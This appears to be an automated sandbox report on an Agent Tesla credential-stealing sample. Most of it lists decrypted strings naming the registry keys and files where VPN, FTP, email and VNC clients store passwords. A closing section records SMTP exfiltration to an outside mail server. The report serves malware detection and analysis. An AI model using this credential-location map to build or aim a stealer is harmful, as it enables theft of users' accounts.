                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: OpenVPN
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Software\OpenVPN-GUI\configs\
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: username
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: auth-data
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: entropy
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: USERPROFILE
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \OpenVPN\config\
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: remote
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: remote
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: NordVPN
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: NordVPN
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: NordVpn.exe*
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: user.config
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: //setting[@name='Username']/value
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: //setting[@name='Password']/value
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: NordVPN
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Private Internet Access
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: %ProgramW6432%
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Private Internet Access\data
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ProgramFiles(x86)
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Private Internet Access\data
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \account.json
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: .*"username":"(.*?)"
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: .*"password":"(.*?)"
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Private Internet Access
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: privateinternetaccess.com
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: FileZilla
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: APPDATA
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \FileZilla\recentservers.xml
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: APPDATA
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \FileZilla\recentservers.xml
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <Server>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <Host>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <Host>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: </Host>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <Port>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: </Port>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <User>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <User>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: </User>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <Pass encoding="base64">
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <Pass encoding="base64">
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: </Pass>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <Pass>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <Pass encoding="base64">
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: </Pass>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: CoreFTP
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: User
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Host
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Port
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: hdfzpysvpzimorhk
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: WinSCP
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: HostName
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: UserName
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: PublicKeyFile
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: PortNumber
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: WinSCP
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ABCDEF
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Flash FXP
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: port
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: user
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: pass
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: quick.dat
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Sites.dat
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \FlashFXP\
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \FlashFXP\
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: FTP Navigator
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SystemDrive
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \FTP Navigator\Ftplist.txt
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Server
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: No Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: User
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SmartFTP
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: APPDATA
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: WS_FTP
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: appdata
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: HOST
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: PWD=
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: PWD=
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: FtpCommander
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SystemDrive
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SystemDrive
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SystemDrive
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \cftp\Ftplist.txt
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ;Password=
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ;User=
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ;Server=
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ;Port=
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ;Port=
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ;Password=
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ;User=
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ;Anonymous=
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: FTPGetter
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \FTPGetter\servers.xml
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <server>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <server_ip>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <server_ip>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: </server_ip>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <server_port>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: </server_port>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <server_user_name>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <server_user_name>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: </server_user_name>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <server_user_password>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <server_user_password>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: </server_user_password>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: FTPGetter
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: The Bat!
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: appdata
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \The Bat!
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Account.CFN
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Account.CFN
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Becky!
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: DataDir
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Folder.lst
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Mailbox.ini
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Account
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: PassWd
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Account
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SMTPServer
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Account
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: MailAddress
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Becky!
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Outlook
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Email
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: IMAP Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: POP3 Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: HTTP Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SMTP Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Email
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Email
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Email
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: IMAP Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: POP3 Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: HTTP Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SMTP Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Server
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Windows Mail App
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Email
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Server
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SchemaId
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: pResourceElement
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: pIdentityElement
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: pPackageSid
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: pAuthenticatorElement
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: syncpassword
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: mailoutgoing
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: FoxMail
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Executable
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: FoxmailPath
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Storage\
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Storage\
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \mail
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \mail
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Accounts\Account.rec0
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Accounts\Account.rec0
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Account.stg
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Account.stg
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: POP3Host
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SMTPHost
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: IncomingServer
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Account
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: MailAddress
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: POP3Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Opera Mail
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: opera:
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: PocoMail
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: appdata
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Pocomail\accounts.ini
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Email
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: POPPass
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SMTPPass
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SMTP
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: eM Client
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: eM Client\accounts.dat
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: eM Client
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Accounts
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: "Username":"
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: "Secret":"
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: "ProviderName":"
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: o6806642kbM7c5
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Mailbird
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SenderIdentities
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Accounts
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Mailbird\Store\Store.db
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Server_Host
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Accounts
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Email
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Username
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: EncryptedPassword
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Mailbird
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: RealVNC 4.x
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: RealVNC 3.x
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: RealVNC 4.x
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: RealVNC 3.x
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Software\ORL\WinVNC3
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: TightVNC
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Software\TightVNC\Server
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: TightVNC
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Software\TightVNC\Server
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: PasswordViewOnly
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: TightVNC ControlPassword
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Software\TightVNC\Server
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ControlPassword
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: TigerVNC
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Software\TigerVNC\Server
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ProgramFiles(x86)
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: passwd
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ProgramFiles(x86)
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: passwd2
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ProgramFiles
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: passwd
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ProgramFiles
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: passwd2
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ProgramFiles
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: passwd
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ProgramFiles
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: passwd2
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ProgramFiles(x86)
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: passwd
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ProgramFiles(x86)
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: passwd2
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: JDownloader 2.0
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: JDownloader 2.0\cfg
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: JDownloader 2.0\cfg
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Paltalk
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: nickname
                      Source: PO23100076.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: PO23100076.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.7:49702 -> 199.79.62.115:587
                      Source: Network trafficSuricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.7:49702 -> 199.79.62.115:587
                      Source: global trafficTCP traffic: 192.168.2.7:49702 -> 199.79.62.115:587
                      Source: global trafficTCP traffic: 192.168.2.7:49588 -> 1.1.1.1:53
                      Source: Joe Sandbox ViewIP Address: 199.79.62.115 199.79.62.115
                      Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                      Source: global trafficTCP traffic: 192.168.2.7:49702 -> 199.79.62.115:587
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: mail.mbarieservicesltd.com
                      Source: PO23100076.exe, 00000008.00000002.2489325941.0000000002A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.mbarieservicesltd.com
